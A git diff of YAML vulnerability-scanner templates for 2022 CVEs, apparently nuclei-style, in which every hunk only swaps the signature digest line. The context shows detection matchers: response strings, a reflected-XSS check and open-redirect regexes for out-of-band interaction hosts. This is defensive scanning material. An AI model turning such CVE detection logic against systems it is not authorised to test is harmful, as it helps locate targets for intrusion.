file diff --git a/http/cves/2022/CVE-2022-0234.yaml b/http/cves/2022/CVE-2022-0234.yaml index 57e9ca5b7f..a0d4943399 100644 --- a/http/cves/2022/CVE-2022-0234.yaml +++ b/http/cves/2022/CVE-2022-0234.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022047ee8df934777d1c36c9d513f845866fc1babd993a8337a3d330048d1e6a806f0220461356a49cfe14504d07523e992fb5f4b7010b01c2df9e5f64b50decabc043b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206ebfdbdff2feb46eb8add866019e0c6acb80eee7f480d3043ba97fcc3786c0960220372aa0defda965512f20464b6e2f9efd57a7911aab279f93acc9b28f3a47fef8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0271.yaml b/http/cves/2022/CVE-2022-0271.yaml index b88cba58cd..84e5d11348 100644 --- a/http/cves/2022/CVE-2022-0271.yaml +++ b/http/cves/2022/CVE-2022-0271.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207bcdd80813e3bb53a903169393ab76e55fd5ac3e02acff9fa2d8067ad6ab297b0221008bb18cbaef7d28bf2c5b4aa93fbccaded6af697a281db594c73f1fd6b0b28f61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220121fab424e81a01466a4b21fafbbd52485cf994244760c19eea5e429a3783c1f022012de38a4abc996c3eb2f45dafb2824b01e4aaf301f7c0a3bd84efc13b13ba11d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0281.yaml b/http/cves/2022/CVE-2022-0281.yaml index 6ae3015b86..e23858ffff 100644 --- a/http/cves/2022/CVE-2022-0281.yaml +++ b/http/cves/2022/CVE-2022-0281.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220552d3cc2790a8fb8ada853011b816e67b148be6db2063639e9518d3ebcae1762022011a0940c35ce73be7f6d5ce093eadb2afbdfc00dd05d86f7da12af5bff26c926:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c111361481180f44493bd61efe5ca22aa1d543889e629e48f1c7a7be22a8e25802205fbf4063808b1e61d84458ca90b142339f86796b9b32deafab8dfa2b59ceda85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0288.yaml b/http/cves/2022/CVE-2022-0288.yaml index fb165f0490..6ae4a378e1 100644 --- a/http/cves/2022/CVE-2022-0288.yaml +++ b/http/cves/2022/CVE-2022-0288.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a1ca7cd22a56a330f431df7aac1d8932a96f61707e94e4cec22162652d6e4fb3022073e6e623e1d660731778b65b288a3bf36e832dd59d8e3eb8377199e6f4915093:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206cdca0024b33589ae65a832d47929fc0ca159c0df30e64a5337b4405c8ec69bc02201774a87d909975e2678aba3545b1d520a0c9a30001a790ec01dac1ff0193ef9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0342.yaml b/http/cves/2022/CVE-2022-0342.yaml index bb1d52c6c2..bb4480858b 100644 --- a/http/cves/2022/CVE-2022-0342.yaml +++ b/http/cves/2022/CVE-2022-0342.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fca2bfe6e495221d0e92c9f3f9df9e355cf1717378ce9d2fa494fbad9d699d33022100aacbe6b4cddf4c9e0d92933a671f26673d6652bbf62dbb2104f716e89dbc46c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204c4a0d8a4c5da1b24b4ca73f20ed5fdee24e4c1892d4e1a075e1002fe92808f4022052cd178910e95afe13abbfb265b687f35a62b6a5abbf2c2aed83508299db6f5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0349.yaml b/http/cves/2022/CVE-2022-0349.yaml index c2b6fe27f2..0e34f8719d 100644 --- a/http/cves/2022/CVE-2022-0349.yaml +++ b/http/cves/2022/CVE-2022-0349.yaml @@ -49,4 +49,4 @@ http: - 'status_code == 200' - 'contains(body, "\"data\":{\"success\":true}")' condition: and -# digest: 4a0a0047304502207d970974e1e2f467896b712cb29eb2ef26ee7fb8c68a046674535b9648cff28c022100e1d478fe2f38bd2d00ca9f58766f9b852ab2a040c835679e082544be8002bfc9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022066280e6a47e91352d98cb30291c051553c64ce566f4b4058a6b38c69f618dca2022100e774340b4d23c31810dcf915c1a593ca0237c07a9dfd39f79842b6feaca32ca3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0378.yaml b/http/cves/2022/CVE-2022-0378.yaml index 3125532a71..69b67c8ec6 100644 --- a/http/cves/2022/CVE-2022-0378.yaml +++ b/http/cves/2022/CVE-2022-0378.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d31eb5fcdb5c34d9b96f1f421b53a01d4f8cdc8054ddfca92190dc846e2c1aa70220763e1ea747d0029947084e36389d8da8a4d1f790faf6f6e4442598d276caae9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022007b6e8a40d0f6e3870e036d67724fb0fd08cfb74510615437a45350d356e17b0022100c9199fa07b53fc012be43bf8c94b4a8caa190a241e907da5e1f265d86ac41aa8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0415.yaml b/http/cves/2022/CVE-2022-0415.yaml index f4219bef5e..a9ba72f2d9 100644 --- a/http/cves/2022/CVE-2022-0415.yaml +++ b/http/cves/2022/CVE-2022-0415.yaml @@ -121,4 +121,4 @@ http: regex: - ' "uuid": "(.*)"' internal: true -# digest: 4b0a00483046022100d0de9a6c1b72efadc8c02bafbcdb9ff5b63b844b20e7f91f616a531f6052cb26022100bac30bdf3623848d4e621700e6f48e61505a34bc12e9dbc46296101bc5f6cef8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b774784e49a3df9cb00ce5134b63c19ea5801279d3f73fe8258a4e7bd9188229022051f7258a2efb6c517fe4b6ef37652544f75db790e763869e48c545dc779f6604:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0422.yaml b/http/cves/2022/CVE-2022-0422.yaml index 257ba52f18..28651d8ae0 100644 --- a/http/cves/2022/CVE-2022-0422.yaml +++ b/http/cves/2022/CVE-2022-0422.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202d864fa8ffa1dc0885d61b1e349c1c268e266c83d7d2e11e236e9df48039abe002205fb0b2d84d41d806cc6e52c0fdd1dbeed94827fa1019c490c3926ec16402eb79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e7e94c080632372fa5c50babf39ba7a30d8605eefd28800449f48e9c0bb3d87602210093ee0d9733e100571cf208953494af1da3728d68c8cf918a63c5d3c99cb6d529:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0424.yaml b/http/cves/2022/CVE-2022-0424.yaml index 1af717e2a6..47f531630a 100644 --- a/http/cves/2022/CVE-2022-0424.yaml +++ b/http/cves/2022/CVE-2022-0424.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e053c1b7ee05de6360e694dc677e8d63d3ff1f7e93d79f51b8809a143d15d129022100a8db2e359329761cce7c314fa1dee1e0309ec32e166b80b386d847eca28a6903:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022036b95be2c5e81b2f7f46714c33c9ef61fb51532f84b8b1dbe5a1ea0e9e8522e70220359bbe2eae61e508bced72287041dc5e1b2d9d9f7b25a2986ffefa3d037d0811:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0432.yaml b/http/cves/2022/CVE-2022-0432.yaml index 67424235b5..4072c86f9f 100644 --- a/http/cves/2022/CVE-2022-0432.yaml +++ b/http/cves/2022/CVE-2022-0432.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022063843a9d6d0d17eeacc243ade32cfac49f2a635d25b41e3fafdccd90b970112002207f0e156e4ecabb743fdd5d829a2d7605122b29b13215eed150e36006f502e45b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a8148a58e14af15f43a223316745a7256c0cbd611ca606478f899763c39adeea022100cf0b11fdbd556d4c93bb9c9754eeb4b73d4902912ea8bd59007dfa52ca55df9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0434.yaml b/http/cves/2022/CVE-2022-0434.yaml index 1ef77cc8fc..fe69127c01 100644 --- a/http/cves/2022/CVE-2022-0434.yaml +++ b/http/cves/2022/CVE-2022-0434.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100acc55f7967bbabb68c2ffe874a2304fefc97e25642bf1d7c8a2140d2bedbe5b4022019f2222b53ae69dddeccd9be785e68cff2b07c8f81f0cfbbb59f12b79cf41a26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bc1036c78901cabdee129666126563f672cba114ea77ee90176ecf491c3295fc02210099b857389ddc319983039ae6a0b9a26798898068cc91422ae1ed759c69e0eeb7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0533.yaml b/http/cves/2022/CVE-2022-0533.yaml index 0990ac2f81..91c83ccdaa 100644 --- a/http/cves/2022/CVE-2022-0533.yaml +++ b/http/cves/2022/CVE-2022-0533.yaml @@ -50,4 +50,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains_all(body_2, "", "ditty")' condition: and -# digest: 4a0a00473045022046175007acf992a4660b401ebdefde82ad92ff7c8c17b87d6a2905129afd98770221009a2b0ee2089dca8202844c0d6f39187acd972cc7ad9aa0c5f5e5b6bd5b1ef364:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c4651a3184861c8bbefb7f1a74c31c6e9527e47135d228a5a04d67cd03771316022100e8a79a6ba89389c010f02d82bca8078e990a30bcfbb116683f13564dec7ce16d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0597.yaml b/http/cves/2022/CVE-2022-0597.yaml index 73e28bd17a..263abc5ea6 100644 --- a/http/cves/2022/CVE-2022-0597.yaml +++ b/http/cves/2022/CVE-2022-0597.yaml @@ -38,4 +38,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$' part: header -# digest: 490a00463044021f597a9521b2543ac4f4806e9d6f3729cf3c8d1f439a5d8a4a25b50ea2ee9ea4022100f83f548e131b5496fda3a4afa094a39c2344535e281eccfc2463ec6eae4a2087:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220127fc3532e0b16006576991cfb52e73f85a92d3d884562d2ff7d24db0f8e96fa02206c7976189f51cf6b8c7f54d25230d5354bd8fe291b5c62619006558544871684:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0599.yaml b/http/cves/2022/CVE-2022-0599.yaml index 64051604c8..870b72f02e 100644 --- a/http/cves/2022/CVE-2022-0599.yaml +++ b/http/cves/2022/CVE-2022-0599.yaml @@ -55,4 +55,4 @@ http: part: body words: - 'id="mmursp_id" value="\">" />' -# digest: 4a0a00473045022016e69d448cdb51d0741136c370514655b3b59fbb6d1cf3a380f6ae0f7e750d3a022100e83f230b3198c39393f19898e616b7f18fdd706b693dda670dfe5964a3d7422a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022000cebad815967ef072bb84784ce548a35391e4673c793d31f5ad3d085f5f62dd022015f171dc652bcc16e8c681a6dc8c3502d10f6cc08f732e41a3bd2e83ddd86813:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0651.yaml b/http/cves/2022/CVE-2022-0651.yaml index 2535aa5cd5..62b50a0d98 100644 --- a/http/cves/2022/CVE-2022-0651.yaml +++ b/http/cves/2022/CVE-2022-0651.yaml @@ -60,4 +60,4 @@ http: regex: - '_wpnonce=([0-9a-zA-Z]+)' internal: true -# digest: 4b0a0048304602210092e5642c6c5b08daa4000f68a948160a1d0d924227b8332de3c7700798ae009e022100e62d7f4a81ebe088f6e4bb11a1f5804845f132125613ebb5e45f9a78e3828459:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201be5e1ae5adef9aca9ac6cbfe29579d972dfd03a20e29140e9a439efe939de56022100ac808c12c9115eb6db6fe499d769a117091688e6b37dd3f332e64d6e97a1c99a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0653.yaml b/http/cves/2022/CVE-2022-0653.yaml index 4c48aa7965..ddee2e5525 100644 --- a/http/cves/2022/CVE-2022-0653.yaml +++ b/http/cves/2022/CVE-2022-0653.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210091b62172c9f552ed6b838c32d0fb253af0500b6380039c00927350af13bd4588022100d74ef37424d0bda0c76c16f24087248e86e5e647e5a6a80879391bd635f0a0dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202cb8744bb8cd388cf8bb62476440ac8b97aab734459eb07a7792d1c1cf7bc94d0221009d1856acb1577ebdadad2a985c047beb2a152bd3e730d0d38d76a07e589bb3b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0656.yaml b/http/cves/2022/CVE-2022-0656.yaml index e985446a6a..8ce94b566d 100644 --- a/http/cves/2022/CVE-2022-0656.yaml +++ b/http/cves/2022/CVE-2022-0656.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e1754a9ee9845d4b7fff44b3fa86b0f357226bfe6c8e1a2188eec44df0349cc6022100821681fd1c6b34cb907739069bef0ac84c01aefb733c8bda81ee38300e2520d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100daccb815e02576ed177b2124df79c942e1d63e1d206d5d829489338a1b95b169022100f879ab199f46378879ea181f4494f79ea1d831a6312b9155023dd1149c8ac305:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0658.yaml b/http/cves/2022/CVE-2022-0658.yaml index d9e1a4f4a5..f256e9836c 100644 --- a/http/cves/2022/CVE-2022-0658.yaml +++ b/http/cves/2022/CVE-2022-0658.yaml @@ -47,4 +47,4 @@ http: - 'contains(header, "application/json")' - 'contains(body, "partiallyBookedDays") && contains(body, "lockDays")' condition: and -# digest: 490a0046304402202f10885d2bb6364e5c282a802ccbac81abbf9ea045f3bd21dac4f9c5ecee380f022078a6dd5254ce2952cf0149e6244b731b7ed78c9a4ad825fdb2c697fc24a340a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dea516f929140a2e2296985cd78a610dc540408796d4ac65fb462ea4200221ec02204757fe9ea8722ca648c35531743432d486f7d889c7b60b6529123bd0d7c443bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0660.yaml b/http/cves/2022/CVE-2022-0660.yaml index f465933e02..7225f2dcfa 100644 --- a/http/cves/2022/CVE-2022-0660.yaml +++ b/http/cves/2022/CVE-2022-0660.yaml @@ -58,4 +58,4 @@ http: - 'contains(header_2,"text/html")' - 'status_code_2==500' condition: and -# digest: 490a00463044022006a6184e06a8bb2508ed86a39022ab8f8c89e52a6ee6b736be84fd8c1f355090022005d2a535f86a1e140b49cf1e94f2d5e08b7016c64e11b0a5ae67908a74aa59d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b3691c4642ebd027767b09ea5d3f374e234b52ea9c2fc2458154fae7be2493a90220147c9b1c3754183476a4091136655e1b49fdf969330a8f16c89117c6ebac5879:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0678.yaml b/http/cves/2022/CVE-2022-0678.yaml index 1bdae5b3d5..d478f5973e 100644 --- a/http/cves/2022/CVE-2022-0678.yaml +++ b/http/cves/2022/CVE-2022-0678.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 404 -# digest: 4a0a00473045022060a91a1d09804415e9a874c7cf72e79326f2e1d3cd4d726bf10be39e1838eb30022100c8557df40dabc252420d8129d314a31f4a47336f23651d99aad5dc9210378e87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220180a6af6f155054628da56264b03a6a512f10f2023af5d0b847eaf4dcdb83da6022100990a359990fc1e0627546724c539f3751cee25a7dbbed63c9a4936295da10c9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0692.yaml b/http/cves/2022/CVE-2022-0692.yaml index 6907b96a3e..da9b7a80fe 100644 --- a/http/cves/2022/CVE-2022-0692.yaml +++ b/http/cves/2022/CVE-2022-0692.yaml @@ -39,4 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a0047304502203ccdb71fff9a5df61a3a988a74c504558a62aab20e47a587ed9499e02cf06e130221008ee594575fd03f101bfb98c81feb97f008c2c26a259bab06eb78c42981ce53a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204c545baba6f000738426962034ba97b795abc508950ae773e0f5efe6248d75cd02205824ebd4b1a42f15cfa6c57b4e1e4fcbe6eac42f725dbb8c0e1e649e1f044c9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0693.yaml b/http/cves/2022/CVE-2022-0693.yaml index 8d2bd3a882..c90a2d731c 100644 --- a/http/cves/2022/CVE-2022-0693.yaml +++ b/http/cves/2022/CVE-2022-0693.yaml @@ -46,4 +46,4 @@ http: - 'status_code == 200' - 'contains(body, "Post Meta Setting Deleted Successfully")' condition: and -# digest: 490a0046304402207093cf93f147e7915511f8d5d2790725c9454030a767b763d349539e7390c37d022033999adb74a9c2868950580b62d5f9d7ac666d555b7f211a4bb473c58e6147bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204f01877da9668618a31c134174c0b1db2eeb1fd33ee26b77bdd0fed4b5a611dd02206407d8588548171f5e8dc630122584d4c228b43379770ceaa7dfd300e960c4e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0735.yaml b/http/cves/2022/CVE-2022-0735.yaml index 63d351902a..2324bd77ac 100644 --- a/http/cves/2022/CVE-2022-0735.yaml +++ b/http/cves/2022/CVE-2022-0735.yaml @@ -112,4 +112,4 @@ http: group: 1 regex: - '(?:application-)(\S{64})(?:\.css)' -# digest: 490a004630440220282a39a1d484373d5c256426da634f467af67ef2885981e93aa49d67e407466d0220644ff375604f1e48db56538b13a3bb3e2a6b0224059239db0c5e8fa99f03e063:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206ac69e4ff94859665b85f9af28b56bb3a1b2785b4718fbb7c6a5374cac45086f022100a9024c393396acc395eba7ba18795618a16f1f4a8cc286ef5a0164e4a832ab2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0747.yaml b/http/cves/2022/CVE-2022-0747.yaml index 615f112b9e..91dc1bd0c2 100644 --- a/http/cves/2022/CVE-2022-0747.yaml +++ b/http/cves/2022/CVE-2022-0747.yaml @@ -52,4 +52,4 @@ http: - 'contains(content_type_2, "text/javascript")' - 'contains(body_2, "show_ilist_templates")' condition: and -# digest: 4a0a0047304502204fd8230c089cad93c94effd40fb9c114ad671d8a70d86a3c94b988923bf8f3a2022100e6190daebd017decedfd78c96cd5e4b2ab2842f0dbbb32bb89afd1f3f9b64a66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220659dd6e81b56b7ad2ca5e164674d68e908074273a0e522aa11bbe64016520f3a02207cd44466e380af3765f85808195b17dc6e318a354fb70704520099f6e978103e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0769.yaml b/http/cves/2022/CVE-2022-0769.yaml index 1d069ca3aa..bcd8a6a5d5 100644 --- a/http/cves/2022/CVE-2022-0769.yaml +++ b/http/cves/2022/CVE-2022-0769.yaml @@ -50,4 +50,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "You have to be logged in to leave your rate")' condition: and -# digest: 4a0a00473045022021e45531cc08e1a67e8853d335d389bf1297ae9b141d21374fa16eac86663f31022100fec13db752fa9a4c514c443c52cf5e5d70753d0a06977056ce21d613825a1d55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202c86f8644cb483f5c622c81dc5f3c84f10db3835fa21a49497270c6ef42cc868022100d4fcdb326b1bb65c5056f8e677aad1fe82328ed18bc6d80f5890f2456e405b8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0776.yaml b/http/cves/2022/CVE-2022-0776.yaml index 931bfa16ab..9022e2380b 100644 --- a/http/cves/2022/CVE-2022-0776.yaml +++ b/http/cves/2022/CVE-2022-0776.yaml @@ -48,4 +48,4 @@ headless: part: extract words: - "true" -# digest: 4b0a004830460221009720f8c313e9c7bfe1e691d95cd242fb5bdd57b13ac1db4e917f6c39f52fbea2022100c9c3f23d0e64a915bbec12c1a178053c1af95773255438a75685716f084fda92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100918dfe2d73769e2b4c3bf2fe3d647e9f1d5a1d315aef145c8b3552d918e65b6f02206e511fac20471835f42d89807cf41b10064b97086e2c26cd3376050c419c09ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0781.yaml b/http/cves/2022/CVE-2022-0781.yaml index 9d9eb411b4..983e344636 100644 --- a/http/cves/2022/CVE-2022-0781.yaml +++ b/http/cves/2022/CVE-2022-0781.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009bc3bdd1d25b20570bb97ffa18d54c7a6df5e7cb397b45c34bf366aef2e54266022100b253fd18bf2cf947e7cdf40ec6c0b2795fae016039491774afe30f62dcd0b397:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d607d59765f03f5697958441c06c4feacda1990edc1bcb64397c92a15ce31d76022100c4a4931ca47ebfd34da937cb77a51e33542b805be7b32aae99260092e75c2522:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0786.yaml b/http/cves/2022/CVE-2022-0786.yaml index 3073a46d3b..937ff593aa 100644 --- a/http/cves/2022/CVE-2022-0786.yaml +++ b/http/cves/2022/CVE-2022-0786.yaml @@ -47,4 +47,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "Doctor details")' condition: and -# digest: 4a0a00473045022036530e0f9ae477a8fa20086d2368da5051b7815179a0d0d31f8c460aaac6b6770221009c700491601f4d7a8a702439cd1625a83ec688c8ca07c8833a80232e7822702e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202a56024067a27384463e32cf94905a97b100cc76d3a7f2e0129ad457e5630b20022100bb7206169a39c10a0a38f769961c00d3cbb7a2b161ead9618270e7b6ace9395a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0787.yaml b/http/cves/2022/CVE-2022-0787.yaml index 168f458082..a727c46818 100644 --- a/http/cves/2022/CVE-2022-0787.yaml +++ b/http/cves/2022/CVE-2022-0787.yaml @@ -46,4 +46,4 @@ http: - contains(header, "text/html") - contains(body, 'iTotalDisplayRecords') condition: and -# digest: 4b0a00483046022100c1aca59874a1ae5dbddc544a985631c3196d79d93a06d7eb676e0885d866551e022100c26d30938d63fcee09cacd868fd8024c89aa2ecbba213e24ecf874ca84b518ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100df4f7156bb701e694be126c2abe6eb09e5622b1cead273ab0e888a73d87dce8a02206a9b7211d792d45b6daaee2e7c7258fb8bcae7c9f8266b6b0312c01be218ec65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0814.yaml b/http/cves/2022/CVE-2022-0814.yaml index 948e02ad78..2df77716c9 100644 --- a/http/cves/2022/CVE-2022-0814.yaml +++ b/http/cves/2022/CVE-2022-0814.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009d0af829a2026e1cbcd7a5b53b3113160e4aa16d2d3f2783e0c08139ae359b11022100fe9df65b9b640062afc5b0aad1fd9ba391be5046758f6b0eda26ff19ed069318:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022010bc2189231d243f08e665fb4a3b7569d771cde4b863887ee13498f58412906702205acc4428a2d8c2bd4452c096dc6361446e33a22431e8c1ec46b3b9bfaf8e9991:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0817.yaml b/http/cves/2022/CVE-2022-0817.yaml index 262e62b79d..eb4abc76ea 100644 --- a/http/cves/2022/CVE-2022-0817.yaml +++ b/http/cves/2022/CVE-2022-0817.yaml @@ -51,4 +51,4 @@ http: - 'contains(content_type, "application/json")' - 'contains(body, "badgeos-arrange-buttons")' condition: and -# digest: 4a0a0047304502204ed17f358a76423c2881abee152da028f535f1868fa7a4531bec8dc26c95903a022100b370a2e1efe65aa0424718e64d256cc337cb4757007a14f0391f132d7ac09294:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203d2db6c67edc8ede8fe11881f8d7fc0bf4d39da48d81012d66509c26e29891b60220295f9c0f3a87ec6903ee013a498d4178afa1ea2260992d56b162bf4b683f237a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0824.yaml b/http/cves/2022/CVE-2022-0824.yaml index ae695e1fd7..401e43baac 100644 --- a/http/cves/2022/CVE-2022-0824.yaml +++ b/http/cves/2022/CVE-2022-0824.yaml @@ -63,4 +63,4 @@ http: part: body words: - "Failed to write to /{{ranstr}}/index.html" -# digest: 4b0a00483046022100f880792facd5c0e768f8ad124c2243e00a94c1c7ec0485023cc33e76ab1be562022100fa1fd25ccd3f731f94205d3572305c156be2fe3431183e251164deffd8ff666c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210096ccef622d932061954ecb20771f9429a01c8cc52f204f7870a6fb7add50da25022100c6e797053ae193bb544e2867fa52ebe9d9b6a9dd54f96da3f50e0ab4556e7f8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0826.yaml b/http/cves/2022/CVE-2022-0826.yaml index 7e7f384310..65d995b0c0 100644 --- a/http/cves/2022/CVE-2022-0826.yaml +++ b/http/cves/2022/CVE-2022-0826.yaml @@ -50,4 +50,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "Registred videos :")' condition: and -# digest: 490a00463044022071c4c48361e7e80e3c9bb8e70b79bd629c31046abfbc032f2bbd8dadc1eeeee102206dd51f47c011042015375863e28a3ed948f9dad86b14ae9733108e39a9280586:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b0745427434292ab72e2d5edeba4a29bea7509eec4aa3484ecbb37faa46d42fc022100dd3a287ead57d36282eddb6ecb7bc9d9159c4f8f35e013e8b08eab4f3bf0ad8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0827.yaml b/http/cves/2022/CVE-2022-0827.yaml index 3763e4c54c..8703340f0b 100644 --- a/http/cves/2022/CVE-2022-0827.yaml +++ b/http/cves/2022/CVE-2022-0827.yaml @@ -49,4 +49,4 @@ http: - 'status_code == 200' - 'contains(body, "Account added successfully")' condition: and -# digest: 4a0a00473045022100fdaa23a706a5b809eb01cf6c5417173600770a25c5fa585784f320d941cd5c940220025f8f4ce8dba7434e925dbb49e99b313ed7831bcbc38ecd5181ff5bdbca7470:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100db95e6660d66b18ab8ce734b9b438e2a4d2626c8b35c7227bb18ddde1a18bcdc022100fb81b33fe69ad1b275eaf4390e07eeb8d34f9fc1035eb938f7f1be4fcb30a916:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0846.yaml b/http/cves/2022/CVE-2022-0846.yaml index 27deefaff5..9d8b1a34bf 100644 --- a/http/cves/2022/CVE-2022-0846.yaml +++ b/http/cves/2022/CVE-2022-0846.yaml @@ -49,4 +49,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "Your signature has been added") || contains(body, "This petition has already been signed using your email address")' condition: and -# digest: 